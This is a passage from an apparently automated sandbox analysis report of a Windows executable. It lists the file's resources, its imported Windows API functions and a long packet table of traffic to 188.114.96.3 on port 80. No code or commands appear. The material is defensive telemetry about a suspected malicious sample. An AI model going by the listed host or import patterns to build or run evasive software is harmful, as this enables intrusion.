RT_ICON	0x55e70	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_STRING	0x58418	0x67c	data
RT_STRING	0x58a98	0x450	data
RT_STRING	0x58ee8	0x3ac	data
RT_ACCELERATOR	0x56350	0x58	data
RT_ACCELERATOR	0x563a8	0x30	data
RT_GROUP_CURSOR	0x56858	0x22	data
RT_GROUP_CURSOR	0x57fd0	0x22	data
RT_GROUP_CURSOR	0x581d8	0x22	data
RT_GROUP_ICON	0x4fab0	0x68	data
RT_GROUP_ICON	0x34028	0x4c	data
RT_GROUP_ICON	0x43118	0x68	data
RT_GROUP_ICON	0x37150	0x30	data
RT_GROUP_ICON	0x3d278	0x68	data
RT_GROUP_ICON	0x49940	0x76	data
RT_GROUP_ICON	0x562d8	0x76	data
RT_VERSION	0x58200	0x214	data

Imports

DLL	Import
KERNEL32.dll	GetCPInfo, FindResourceExW, EndUpdateResourceW, InterlockedIncrement, GetConsoleAliasA, SetConsoleActiveScreenBuffer, GetModuleHandleW, GetGeoInfoW, GetPriorityClass, GlobalAlloc, LoadLibraryW, CreateEventA, GetSystemWindowsDirectoryA, EnumSystemCodePagesA, GetNamedPipeInfo, GetDevicePowerState, IsBadStringPtrA, LCMapStringA, SetLastError, GetConsoleAliasExesA, GetProcAddress, VirtualAlloc, HeapSize, LoadLibraryA, OpenWaitableTimerW, DnsHostnameToComputerNameA, AddAtomW, GetCommMask, FoldStringW, lstrcmpiW, BuildCommDCBA, VirtualProtect, GetConsoleCursorInfo, GetVolumeNameForVolumeMountPointW, CreateWaitableTimerA, GetConsoleProcessList, EnumCalendarInfoExA, LCMapStringW, CreateFiber, lstrlenA, ReadConsoleOutputCharacterA, GetComputerNameA, GetLastError, HeapFree, Sleep, ExitProcess, GetStartupInfoW, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapAlloc, HeapReAlloc, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedDecrement, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RaiseException, WriteFile, GetStdHandle, GetModuleFileNameA, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, GetACP, GetOEMCP, IsValidCodePage, GetModuleHandleA, GetLocaleInfoA, WideCharToMultiByte, GetStringTypeA, MultiByteToWideChar, GetStringTypeW
USER32.dll	LoadMenuA, SetCaretPos, GetMenuItemID
GDI32.dll	GetCharWidthA
ADVAPI32.dll	BackupEventLogW

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 25, 2023 09:28:11.568511009 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.586102009 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.586241961 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.586745024 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.586745977 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.603856087 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.603900909 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.725743055 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.725814104 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.725912094 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.739520073 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.739564896 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.760066986 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.760123014 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.821665049 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.821738005 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.821789980 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.821837902 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.821856976 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.821885109 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.821911097 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.821933985 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.821981907 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.822033882 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.822046995 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.822108030 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.822256088 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.822305918 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.822354078 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.822366953 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.822397947 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.822457075 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.864998102 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.865067959 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.865115881 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.865165949 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.865199089 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.865211010 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.865257025 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.865258932 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.865307093 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.865343094 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.865355968 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.865415096 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.866022110 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.866070986 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.866117954 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.866147041 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.866164923 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.866239071 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.866822004 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.866868019 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.866913080 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.866947889 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.866961002 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.867021084 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.867681980 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.867774010 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.867818117 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.867851019 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.867865086 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.867933035 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.870872974 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.870923042 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.870965004 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.871004105 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.909089088 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.909207106 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.909255981 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.909269094 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.909321070 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.909351110 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.909368038 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.909418106 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.909440041 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.909465075 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.909511089 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.909528017 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.910379887 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.910433054 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.910464048 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.910480022 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.910528898 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.910551071 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.911082029 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.911133051 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.911155939 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.911180019 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.911226988 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.911274910 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.911904097 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.911952019 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.911997080 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.912044048 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.912086010 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.912723064 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.912769079 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.912816048 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.912816048 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.912863016 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.912894011 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.913599968 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.913645029 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.913691998 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.913707018 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.913764000 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.913769960 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.914383888 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.914431095 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.914493084 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.914501905 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.914541960 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.914561033 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.915162086 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.915213108 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.915366888 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.915546894 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.915594101 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.915673018 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.916002989 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.916054010 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.916100979 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.916100979 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.916165113 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.916177034 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.916840076 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.916892052 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.916937113 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.916935921 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.916984081 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.917021990 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.917912006 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.917948961 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.918040991 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.952044964 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.952101946 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.952147961 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.952194929 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.952195883 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.952244043 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.952450991 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.952500105 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.952545881 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.952563047 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.952591896 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.952599049 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.952639103 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.953430891 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.953484058 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.953505039 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.953536034 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.953551054 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.953598976 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.953644037 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.953696966 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.954302073 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.954349041 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.954380989 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.954392910 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.954458952 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.954519033 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.955125093 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.955169916 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.955214024 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.955245972 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.955264091 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.955279112 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.955948114 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.956005096 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.956051111 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.956068039 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.956101894 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.956104040 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.956739902 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.956790924 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.956859112 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.956865072 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.956933975 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.956995964 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.957606077 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.957657099 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.957703114 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.957717896 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.957750082 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.957758904 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.958410025 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.958514929 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.958520889 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.958594084 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.958636999 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.958702087 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.959244967 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.959304094 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.959347963 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.959372997 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.959388018 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.959399939 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.960087061 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.960130930 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.960170984 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.960174084 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.960211992 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.960228920 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.960941076 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.960982084 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.961019993 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.961052895 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.961060047 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.961077929 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.962485075 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.963228941 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.972110033 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.972166061 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.972213030 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.972253084 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.972407103 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.972464085 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.972470999 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.972508907 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.972567081 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.972621918 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.973263979 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.973313093 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.973360062 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.973391056 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.973407030 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.973423958 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.974064112 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.974112034 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.974159002 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.974181890 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.974205017 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.974230051 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.974930048 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.974978924 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.975024939 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.975049019 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.975071907 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.975085020 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.975734949 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.975780964 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.975826979 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.975845098 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.975876093 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.975886106 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.976695061 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.976743937 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.976778984 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.976813078 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.976850986 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.977749109 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.977797031 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.977844954 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.977891922 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.977910995 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.977942944 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.978192091 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.978249073 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.978295088 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.978317976 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.978343010 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.978903055 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.978950024 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.978969097 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.978996992 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.979007959 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.979044914 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.979114056 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.979758978 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.979831934 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.979887009 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.979926109 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.979948044 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.979979992 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.996501923 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.996565104 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.996611118 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.996655941 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.996701002 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.996747017 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.996788025 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.996798992 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.996918917 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.996953964 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.996968031 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.997000933 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.997014046 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.997061014 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.997108936 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.997153044 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.997159004 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.997159958 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.997200012 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.997272968 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.997936964 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.997994900 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.998059034 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.998079062 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.998110056 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.998155117 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.998186111 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.998199940 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.998248100 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.998306036 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.998887062 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.998934031 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.998980045 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.999006033 CET	49736	80	192.168.2.4	188.114.96.3
